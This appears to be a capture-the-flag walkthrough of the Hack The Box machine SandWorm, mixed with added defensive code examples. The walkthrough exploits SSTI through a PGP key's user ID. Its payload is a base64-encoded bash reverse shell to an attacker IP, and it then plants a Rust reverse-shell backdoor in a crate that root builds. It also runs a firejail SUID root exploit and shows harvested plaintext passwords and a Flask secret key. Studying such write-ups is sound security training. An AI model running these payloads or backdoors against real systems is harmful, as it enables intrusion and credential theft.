2023-06-18 10:10:16
Nmap
┌──(root💀kali)-[~]
└─# nmap -A 10.10.11.218 130 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 22:09 EDT
Nmap scan report for 10.10.11.218
Host is up (0.32s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://ssa.htb/
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: Secret Spy Agency | Secret Security Service
|_http-server-header: nginx/1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA
| Not valid before: 2023-05-04T18:03:25
|_Not valid after: 2050-09-19T18:03:25
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Ports 22, 80 and 443 are open.
Add ssa.htb to the hosts file.
The site uses asymmetric cryptography to encrypt and decrypt content.
The technology used is PGP, which is mainly used for email encryption.
The principle is:
Encrypt
- When encrypting, first generate a (random) symmetric key, TlakvAQkCu2u, and encrypt the data with it.
- The sender then encrypts this randomly generated symmetric key with the recipient's public key, and sends the data (encrypted under the symmetric key) together with the symmetric key (encrypted under the recipient's public key).
Decrypt
- First separate the data from the encrypted symmetric key; at this point both parts are still encrypted.
- The recipient uses their own private key to decrypt the symmetric key (q4fzNeBCRSyqv) and recovers TlakvAQkCu2u.
- The symmetric key (TlakvAQkCu2u) is then used to decrypt the data.
Decrypting content
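The two-step flow above, carried through in code as an added example (not from the write-up): a random session key encrypts the data, the recipient's public key wraps the session key, both travel together, and the recipient unwraps with the private key before decrypting the data. Textbook RSA on two fixed Mersenne primes (M61 and M89) and a SHA-256 keystream are stand-ins for the RSA-3072 and block cipher GnuPG really uses; they show the data flow and are not secure. The session-key string is the one the write-up uses.

```python
"""PGP-style hybrid encryption, step by step.

Added example; not code from the original write-up. Textbook RSA on two
fixed Mersenne primes (M61 and M89) and a SHA-256 keystream stand in for
the RSA-3072 and the block cipher GnuPG actually uses: enough to show the
data flow, nowhere near secure.
"""
import hashlib
import os

# --- asymmetric part: textbook RSA (no padding) on small fixed primes ---
P = (1 << 61) - 1                  # M61, a Mersenne prime (illustrative size only)
Q = (1 << 89) - 1                  # M89, also prime
N = P * Q                          # ~150-bit modulus; a 96-bit session key fits below it
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent (modular inverse, Python 3.8+)
PUBLIC_KEY = (N, E)                # what the recipient publishes
PRIVATE_KEY = (N, D)               # what only the recipient holds

SESSION_KEY_LEN = 12               # bytes; the write-up's key "TlakvAQkCu2u" is 12 chars


def rsa_encrypt(m: int, pub=PUBLIC_KEY) -> int:
    n, e = pub
    assert 0 <= m < n, "message integer must be smaller than the modulus"
    return pow(m, e, n)


def rsa_decrypt(c: int, priv=PRIVATE_KEY) -> int:
    n, d = priv
    return pow(c, d, n)


# --- symmetric part: XOR with a keystream derived from SHA-256(key || counter) ---
def stream_xor(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (the operation is its own inverse). Because the
    session key is fresh for every message, this demo needs no nonce."""
    out = bytearray()
    for block in range((len(data) + 31) // 32):
        keystream = hashlib.sha256(key + block.to_bytes(4, "big")).digest()
        chunk = data[block * 32:(block + 1) * 32]
        out.extend(a ^ b for a, b in zip(chunk, keystream))
    return bytes(out)


# --- the sender's two steps from the write-up ---
def encrypt_message(data: bytes, recipient_pub=PUBLIC_KEY, session_key=None) -> dict:
    if session_key is None:
        session_key = os.urandom(SESSION_KEY_LEN)       # step 1: random symmetric key
    ciphertext = stream_xor(session_key, data)           # step 1: encrypt data with it
    wrapped = rsa_encrypt(int.from_bytes(session_key, "big"), recipient_pub)  # step 2
    return {"wrapped_key": wrapped, "ciphertext": ciphertext}  # both parts travel together


# --- the recipient's three steps ---
def decrypt_message(packet: dict, recipient_priv=PRIVATE_KEY) -> bytes:
    wrapped, ciphertext = packet["wrapped_key"], packet["ciphertext"]  # separate the parts
    key_int = rsa_decrypt(wrapped, recipient_priv)                     # unwrap with private key
    session_key = key_int.to_bytes(SESSION_KEY_LEN, "big")
    return stream_xor(session_key, ciphertext)                         # decrypt the data


if __name__ == "__main__":
    pkt = encrypt_message(b"nihao123", session_key=b"TlakvAQkCu2u")
    print("wrapped session key (int):", pkt["wrapped_key"])
    print("recovered:", decrypt_message(pkt))
```

Only the wrapped key depends on the recipient's key pair; the data itself is encrypted symmetrically, which is why PGP can encrypt a large file to several recipients by wrapping the same session key once per recipient.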
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/SandWorm]
└─# cat message.txt
nihao123;whaomi;#
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/SandWorm]
└─# gpg --encrypt --recipient-file id_rsa.pub message.txt
File 'message.txt.gpg' exists. Overwrite? (y/N) y
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/SandWorm]
└─# cat message.txt
nihao123;whaomi;#
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/SandWorm]
└─# cat message.txt.gpg | base64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==
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/SandWorm]
Use this site to URL-encode the encrypted content.
Verify signature
Signature verified successfully:
Signature is valid!
[GNUPG:] NEWSIG gpg: Signature made Thu 04 May 2023 04:13:47 PM UTC gpg: using RSA key D6BA9423021A0839CCC6F3C8C61D429110B625D4
[GNUPG:] KEY_CONSIDERED D6BA9423021A0839CCC6F3C8C61D429110B625D4 0
[GNUPG:] SIG_ID CsBPTL20G6/YKI6iNhSErGIXx5U 2023-05-04 1683216827
[GNUPG:] KEY_CONSIDERED D6BA9423021A0839CCC6F3C8C61D429110B625D4 0
[GNUPG:] GOODSIG C61D429110B625D4 SSA (Official PGP Key of the Secret Spy Agency.) gpg: Good signature from "SSA (Official PGP Key of the Secret Spy Agency.) " [ultimate]
[GNUPG:] VALIDSIG D6BA9423021A0839CCC6F3C8C61D429110B625D4 2023-05-04 1683216827 0 4 0 1 8 01 D6BA9423021A0839CCC6F3C8C61D429110B625D4
[GNUPG:] TRUST_ULTIMATE 0 pgp
The signature-verification page echoes back information taken from the signature, and the site itself is built with Flask, so let's look for a place where SSTI is possible.
The site's public and private keys are handled with the gpg command, so let's review the common commands.
Common gpg commands and what they do:
- gpg --gen-key: generate a new key pair (public and private key). During generation you are asked for a name, an email address and a passphrase.
- gpg --list-keys: list all generated public keys.
- gpg --import <filename>: import a public or private key file.
- gpg --armor --export <email>: export the public key for the given email address in ASCII-armored form.
- gpg --encrypt --recipient <recipient-email> <filename>: encrypt a file with the given recipient's public key so that only the holder of the matching private key can decrypt it.
- gpg --decrypt <filename>: decrypt a file; the user must hold the matching private key.
- gpg --verify <filename>: verify that a signature file matches the original file.
These are the most common GPG commands, but GPG has many more; see the official GPG documentation for details.
Common signature-related GPG commands:
- gpg --sign <filename>: digitally sign a file. By default the user's default key is used; another key can be specified.
- gpg --clearsign <filename>: clear-sign a text file. The file is not encrypted; the signature is appended at the end, so the text stays human-readable.
- gpg --verify <signed-filename>: verify that a digital signature is valid and was made by a trusted key holder.
- gpg --detach-sign <filename>: produce a separate signature file instead of appending the signature to the file; typically used for binaries.
These are some of the common signature-related GPG commands; there are many others. See the official GPG documentation for details.
Generate our own key pair and signature
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --gen-key
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Note: Use "gpg --full-generate-key" for a full featured key generation dialog.
GnuPG needs to construct a user ID to identify your key.
Real name: {{1*7}}@qq.com
Email address: {{1*7}}@qq.com
You selected this USER-ID:
"{{1*7}}@qq.com <{{1*7}}@qq.com>"
Change (N)ame, (E)mail, or (O)kay/(Q)uit? O
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: revocation certificate stored as '/root/.gnupg/openpgp-revocs.d/7DEF520F8486A158CEFE281E3EF0D0B3755A0252.rev'
public and secret key created and signed.
pub rsa3072 2023-06-20 [SC] [expires: 2025-06-19]
7DEF520F8486A158CEFE281E3EF0D0B3755A0252
uid {{1*7}}@qq.com <{{1*7}}@qq.com>
sub rsa3072 2023-06-20 [E] [expires: 2025-06-19]
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# ls
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --list-key
gpg: checking the trustdb
gpg: marginals needed: 3 completes needed: 1 trust model: pgp
gpg: depth: 0 valid: 1 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: next trustdb check due at 2025-06-19
/root/.gnupg/pubring.kbx
------------------------
pub rsa3072 2023-06-20 [SC] [expires: 2025-06-19]
7DEF520F8486A158CEFE281E3EF0D0B3755A0252
uid [ultimate] {{1*7}}@qq.com <{{1*7}}@qq.com>
sub rsa3072 2023-06-20 [E] [expires: 2025-06-19]
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# echo test > msg
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# ls
msg
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --armor --export {{1*7}}@qq.com
-----BEGIN PGP PUBLIC KEY BLOCK-----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=uSFb
-----END PGP PUBLIC KEY BLOCK-----
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# ls
msg
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --armor --export {{1*7}}@qq.com > publicKey
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# ls
msg publicKey
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --clear-sign msg
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# ls
msg msg.asc publicKey
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# cat msg.asc
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
test
-----BEGIN PGP SIGNATURE-----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=SXBu
-----END PGP SIGNATURE-----
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─#
Put the public key and the signature just generated into the corresponding fields.
The site renders our {{1*7}} as 7, which shows that SSTI injection is possible here.
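The root cause observed here and at the verification step above is that the server hands gpg's output, including the signer's user ID, to the template engine as template source. The added example below is not the SSA site's code (its Flask handler is not on the page); it shows the defender's alternative: decide validity from GnuPG's machine-readable `--status-fd` records, pin the expected fingerprint, and treat the UID as data that is escaped for display and never interpolated into a template. The first status block is constructed from the write-up's verification output; the second imitates a self-made key with template syntax in its UID, with a constructed signature timestamp.

```python
"""Decide signature validity from GnuPG's machine-readable status lines and keep
the signer's user ID as inert data.

Added example; not the SSA site's Flask code (which is not on the page). The
status records below are constructed from the write-up's verification output;
the second set imitates a self-made key whose UID carries template syntax.
"""
import html
from dataclasses import dataclass, field
from typing import List, Optional, Set

STATUS_PREFIX = "[GNUPG:] "
# Ownertrust levels gpg reports for the signing key, weakest to strongest.
TRUST_ORDER = ["TRUST_NEVER", "TRUST_UNDEFINED", "TRUST_MARGINAL",
               "TRUST_FULLY", "TRUST_ULTIMATE"]
BAD_TAGS = {"BADSIG", "ERRSIG", "EXPSIG", "EXPKEYSIG", "REVKEYSIG"}


@dataclass
class Verdict:
    good: bool = False
    key_id: Optional[str] = None
    fingerprint: Optional[str] = None
    uid: str = ""                 # opaque data: whatever the key owner typed as a name
    trust: Optional[str] = None
    problems: List[str] = field(default_factory=list)


def parse_status(text: str, min_trust: str = "TRUST_FULLY",
                 allowed_fingerprints: Optional[Set[str]] = None) -> Verdict:
    v = Verdict()
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith(STATUS_PREFIX):
            continue                                   # skip "gpg: ..." text meant for humans
        tag, _, rest = line[len(STATUS_PREFIX):].partition(" ")
        if tag == "GOODSIG":
            v.key_id, _, v.uid = rest.partition(" ")   # UID is the remainder, spaces and all
        elif tag in BAD_TAGS:
            v.problems.append(tag)
        elif tag == "VALIDSIG":
            v.fingerprint = rest.split(" ", 1)[0]       # first field is the signing fingerprint
        elif tag.startswith("TRUST_"):
            v.trust = tag
    if v.key_id is None:
        v.problems.append("no GOODSIG")
    if v.fingerprint is None:
        v.problems.append("no VALIDSIG")
    rank = TRUST_ORDER.index(v.trust) if v.trust in TRUST_ORDER else -1
    if rank < TRUST_ORDER.index(min_trust):
        v.problems.append(f"trust {v.trust} below required {min_trust}")
    if allowed_fingerprints is not None and v.fingerprint not in allowed_fingerprints:
        v.problems.append("fingerprint not in allowlist")
    v.good = not v.problems
    return v


def render_signer(v: Verdict) -> str:
    """HTML fragment for the result page. The UID is escaped as data, so
    template syntax such as {{1*7}} stays literal text and is never evaluated."""
    state = "valid" if v.good else "rejected"
    return f'<span class="sig-{state}">{html.escape(v.uid)}</span>'


# Constructed from the write-up's gpg output for the SSA key; the "gpg:" line
# is kept to show that human-readable chatter is ignored by the parser.
SSA_STATUS = """\
[GNUPG:] NEWSIG
gpg: Signature made Thu 04 May 2023 04:13:47 PM UTC
[GNUPG:] KEY_CONSIDERED D6BA9423021A0839CCC6F3C8C61D429110B625D4 0
[GNUPG:] GOODSIG C61D429110B625D4 SSA (Official PGP Key of the Secret Spy Agency.)
[GNUPG:] VALIDSIG D6BA9423021A0839CCC6F3C8C61D429110B625D4 2023-05-04 1683216827 0 4 0 1 8 01 D6BA9423021A0839CCC6F3C8C61D429110B625D4
[GNUPG:] TRUST_ULTIMATE 0 pgp
"""

# Constructed: a cryptographically good signature from a key the server has
# never trusted, whose UID carries template syntax (timestamp is made up).
SELF_MADE_STATUS = """\
[GNUPG:] NEWSIG
[GNUPG:] GOODSIG 3EF0D0B3755A0252 {{1*7}}@qq.com <{{1*7}}@qq.com>
[GNUPG:] VALIDSIG 7DEF520F8486A158CEFE281E3EF0D0B3755A0252 2023-06-20 1687219200 0 4 0 1 8 01 7DEF520F8486A158CEFE281E3EF0D0B3755A0252
[GNUPG:] TRUST_UNDEFINED 0 pgp
"""

if __name__ == "__main__":
    for name, status in (("SSA", SSA_STATUS), ("self-made", SELF_MADE_STATUS)):
        verdict = parse_status(status)
        print(name, "good" if verdict.good else verdict.problems, render_signer(verdict))
```

A "good signature" from gpg only means the mathematics checked out for whatever key was supplied; whether that key is one the application should trust is a separate decision, which is why the parser requires a trust level and can pin a fingerprint. Rendering the escaped UID through a template variable (`{{ signer }}` in Jinja2) is safe for the same reason `render_signer` is: the value is data, not template text.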
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --edit-key {{1*7}}@qq.com 130 ⨯
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Secret key is available.
sec rsa3072/3EF0D0B3755A0252
created: 2023-06-20 expires: 2025-06-19 usage: SC
trust: ultimate validity: ultimate
ssb rsa3072/572C2905CEB9039C
created: 2023-06-20 expires: 2025-06-19 usage: E
[ultimate] (1) {{1*7}}@qq.com <{{1*7}}@qq.com>
gpg> adduid
Real name: {{ self.__init__.__globals__.__builtins__.__import__('os').popen("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42LzQ0NDQgMD4mMQo=|base64 -d|bash").read() }}
Email address: someb0dy@htb.com
Comment:
You selected this USER-ID:
"{{ self.__init__.__globals__.__builtins__.__import__('os').popen("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42LzQ0NDQgMD4mMQo=|base64 -d|bash").read() }} <someb0dy@htb.com>"
Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
sec rsa3072/3EF0D0B3755A0252
created: 2023-06-20 expires: 2025-06-19 usage: SC
trust: ultimate validity: ultimate
ssb rsa3072/572C2905CEB9039C
created: 2023-06-20 expires: 2025-06-19 usage: E
[ultimate] (1) {{1*7}}@qq.com <{{1*7}}@qq.com>
[ unknown] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42LzQ0NDQgMD4mMQo=|base64 -d|bash").read() }} <someb0dy@htb.com>
gpg> save
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --clear-sign msg
File 'msg.asc' exists. Overwrite? (y/N) y
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --armor --export {{1*7}}@qq.com > publicKey
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# cat msg.asc
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
test
-----BEGIN PGP SIGNATURE-----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=j2Zl
-----END PGP SIGNATURE-----
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# cat publicKey
-----BEGIN PGP PUBLIC KEY BLOCK-----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=12ny
-----END PGP PUBLIC KEY BLOCK-----
Reverse shell
Use this to execute a command and get a reverse shell.
Put the public key and signature generated above here.
shell!!!
atlas@sandworm:/var/www/html/SSA/SSA$ cat __in
cat __init__.py
```python
from flask import Flask
from flask_login import LoginManager
from flask_sqlalchemy import SQLAlchemy

db = SQLAlchemy()

def create_app():
    app = Flask(__name__)
    app.config['SECRET_KEY'] = '91668c1bc67132e3dcfb5b1a3e0c5c21'
    app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://atlas:GarlicAndOnionZ42@127.0.0.1:3306/SSA'
    db.init_app(app)

    # blueprint for non-auth parts of app
    from .app import main as main_blueprint
    app.register_blueprint(main_blueprint)

    login_manager = LoginManager()
    login_manager.login_view = "main.login"
    login_manager.init_app(app)

    from .models import User

    @login_manager.user_loader
    def load_user(user_id):
        return User.query.get(int(user_id))

    return app
```
The database connection password was found in the code under the web root:

| username | passwd |
|---|---|
| atlas | GarlicAndOnionZ42 |

But the mysql command is not available (-_-); presumably many commands cannot be run inside the sandbox.
Finally, digging through the home directory, there is a configuration file:
/home/atlas/.config/httpie/sessions/localhost_5000
cat admin.json
```json
{
    "__meta__": {
        "about": "HTTPie session file",
        "help": "https://httpie.io/docs#sessions",
        "httpie": "2.6.0"
    },
    "auth": {
        "password": "quietLiketheWind22",
        "type": null,
        "username": "silentobserver"
    },
    "cookies": {
        "session": {
            "expires": null,
            "path": "/",
            "secure": false,
            "value": "eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkludmFsaWQgY3JlZGVudGlhbHMuIl19XX0.Y-I86w.JbELpZIwyATpR58qg1MGJsd6FkA"
        }
    },
    "headers": {
        "Accept": "application/json, */*;q=0.5"
    }
}
```
atlas@sandworm:~/.config/httpie/sessions/localhost_5000$ pwd
pwd
/home/atlas/.config/httpie/sessions/localhost_5000
| username | passwd |
|---|---|
| silentobserver | quietLiketheWind22 |

SSH login succeeds with these credentials and the user flag is obtained.
Root
On closer inspection there should be a scheduled task that runs as root.
While browsing the filesystem, found /opt/crates/logger/src:
```rust
extern crate chrono;
use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;

pub fn log(user: &str, query: &str, justification: &str) {
    let now = Local::now();
    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);
    let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
        Ok(file) => file,
        Err(e) => {
            println!("Error opening log file: {}", e);
            return;
        }
    };
    if let Err(e) = file.write_all(log_message.as_bytes()) {
        println!("Error writing to log file: {}", e);
    }
}
```
This is a Rust logging crate; presumably it gets executed by that task.
We have full write access to this file, so change it into a reverse shell.
RustBackDoor
```rust
extern crate chrono;
use std::net::TcpStream;
use std::os::unix::io::{AsRawFd, FromRawFd};
use std::process::{Command, Stdio};

pub fn log(user: &str, query: &str, justification: &str) {
    let sock = TcpStream::connect("<IP attack>:4444").unwrap();
    let fd = sock.as_raw_fd();
    Command::new("/bin/bash")
        .arg("-i")
        .stdin(unsafe { Stdio::from_raw_fd(fd) })
        .stdout(unsafe { Stdio::from_raw_fd(fd) })
        .stderr(unsafe { Stdio::from_raw_fd(fd) })
        .spawn()
        .unwrap()
        .wait()
        .unwrap();
}
```
After modifying lib.rs and waiting a moment, the reverse shell connects back. This time the atlas user is not sandboxed, and id shows an extra group, which should be jailer.
firejail has the SUID bit set.
The privilege escalation is the same as on the earlier Cerberus machine.
Refer: https://gist.githubusercontent.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25/raw/86058ce12f69997b2de35c5de7bcd3036654f32f/exploit.py
Privilege-escalation script
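The weakness the two steps above exploit is a source tree that a privileged job builds and runs while an unprivileged user can edit it. The added example below is not from the write-up or the machine: it is a small audit that reproduces that condition on a constructed temporary tree (a lib.rs left world-writable next to a read-only Cargo.toml) and reports every file or directory a given unprivileged uid could change. The uid 65534 and the fixture layout are assumptions; on a real host you would point audit_tree at the directory the root task uses and at the web user's uid and groups.

```python
"""Flag source files that an unprivileged user could modify under a directory
that a privileged job compiles or runs.

Added example; not from the original write-up or the machine. The fixture
mimics /opt/crates/logger with src/lib.rs world-writable, so the check runs
anywhere without touching a real system.
"""
import os
import shutil
import stat
import tempfile
from pathlib import Path
from typing import List, Set, Tuple


def writable_by(path: Path, uid: int, gids: Set[int]) -> bool:
    """True if a process with this uid and these gids could write to path
    (owner, group or world write bit). os.access() is deliberately not used:
    it would answer for the *current* process, not the user being audited."""
    st = path.stat()
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def audit_tree(root: Path, uid: int, gids: Set[int]) -> List[Tuple[str, str]]:
    """Return (relative path, reason) for every entry the user could change.
    A writable directory counts too: it lets the user replace files inside it
    even when those files are themselves read-only."""
    findings = []
    for p in sorted(root.rglob("*")):
        if p.is_symlink():
            continue                       # audit the link target where it lives, not here
        if writable_by(p, uid, gids):
            kind = "dir" if p.is_dir() else "file"
            findings.append((str(p.relative_to(root)), f"{kind} writable by uid {uid}"))
    return findings


def build_fixture() -> Path:
    """Constructed tree shaped like /opt/crates/logger: src/lib.rs is
    world-writable, Cargo.toml and the directories are not."""
    root = Path(tempfile.mkdtemp(prefix="crate_audit_"))
    src = root / "src"
    src.mkdir()
    (root / "Cargo.toml").write_text('[package]\nname = "logger"\n')
    (src / "lib.rs").write_text("pub fn log() {}\n")
    os.chmod(root, 0o755)
    os.chmod(src, 0o755)
    os.chmod(root / "Cargo.toml", 0o644)
    os.chmod(src / "lib.rs", 0o666)        # the dangerous bit: anyone can edit the source
    return root


def run_demo() -> List[Tuple[str, str]]:
    """Build the fixture, audit it from the viewpoint of an unrelated
    unprivileged uid (65534, assumed), and clean up."""
    root = build_fixture()
    try:
        return audit_tree(root, uid=65534, gids={65534})
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for rel, why in run_demo():
        print(f"{rel}: {why}")
```

The same logic applies to the build inputs a root job reads indirectly (Cargo.toml, vendored dependencies, the target directory), which is why the audit walks the whole tree rather than only the .rs files.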
atlas@sandworm:~/someb0dy$ python3 exploit.py
python3 exploit.py
/home/atlas/someb0dy/exploit.py needs to have the execute bit set for the exploit to work. Run `chmod +x /home/atlas/someb0dy/exploit.py` and try again.
atlas@sandworm:~/someb0dy$ python3 -c "import pty;pty.spawn('/bin/bash')"
python3 -c "import pty;pty.spawn('/bin/bash')"
atlas@sandworm:~/someb0dy$ chmod +x
chmod +x exploit.py
atlas@sandworm:~/someb0dy$ python3 exploit.py
python3 exploit.py
You can now run 'firejail --join=239891' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.
ls
ls
Then get another reverse shell and, in the other terminal, run:
- firejail --join=239891
- then su -
atlas@sandworm:/opt/tipnet$ firejail --join=239891
firejail --join=239891
Warning: cleaning all supplementary groups
changing root to /proc/239891/root
Child process initialized in 7.52 ms
su -
id
uid=0(root) gid=0(root) groups=0(root)